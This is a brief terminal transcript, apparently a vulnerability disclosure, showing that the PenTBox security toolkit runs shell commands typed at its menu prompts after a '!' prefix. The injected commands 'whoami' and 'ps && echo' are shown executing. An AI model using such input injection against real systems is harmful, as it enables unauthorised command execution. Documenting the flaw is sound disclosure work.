#################### PenTBox command execution example, look at user input. #################### $ ./pentbox.rb PenTBox 1.4_dev-updated .__. (oo)____ (__) )--* ||--|| Security starts here. --------- Menu ruby1.9.2 @ x86_64-linux 1- Cryptography tools 2- Network tools 3- Web 4- License and contact 5- Exit -> 1 1- Base64 Encoder & Decoder 2- Multi-Digest (MD5, SHA1, SHA256, SHA384, SHA512, RIPEMD-160) 3- Hash Password Cracker (MD5, SHA1, SHA256, SHA384, SHA512, RIPEMD-160) 4- Secure Password Generator 0- Back -> !whoami alberto --- -> 2 // Multi-Digest (MD5, SHA1, SHA256, SHA384, SHA512, RIPEMD-160) // Insert string to digest. -> !ps && echo "ps looks fine" PID TTY TIME CMD 4038 pts/0 00:00:00 bash 11448 pts/0 00:00:00 sh 11468 pts/0 00:00:00 ruby 11490 pts/0 00:00:00 sh 11492 pts/0 00:00:00 ps ps looks fine --- -> qwerty MD5 = d8578edf8458ce06fbc5bb76a58c5ca4 SHA1 = b1b3773a05c0ed0176787a4f1574ff0075f7521e SHA2 (256) = 65e84be33532fb784c48129675f9eff3a682b27168c0ea744b2cf58ee02337c5 SHA2 (384) = 1ab60e110d41a9aac5e30d086c490819bfe3461b38c76b9602fe9686aa0aa3d28c63c96a1019e3788c40a14f4292e50f SHA2 (512) = 0dd3e512642c97ca3f747f9a76e374fbda73f9292823c0313be9d78add7cdd8f72235af0c553dd26797e78e1854edee0ae002f8aba074b066dfce1af114e32f8 RIPEMD-160 = 3a0ede1791358f307ae1f211d3fc4acf677644d8 [*] Module execution finished. --------- Menu ruby1.9.2 @ x86_64-linux 1- Cryptography tools 2- Network tools 3- Web 4- License and contact 5- Exit -> ^C [*] EXITING ... $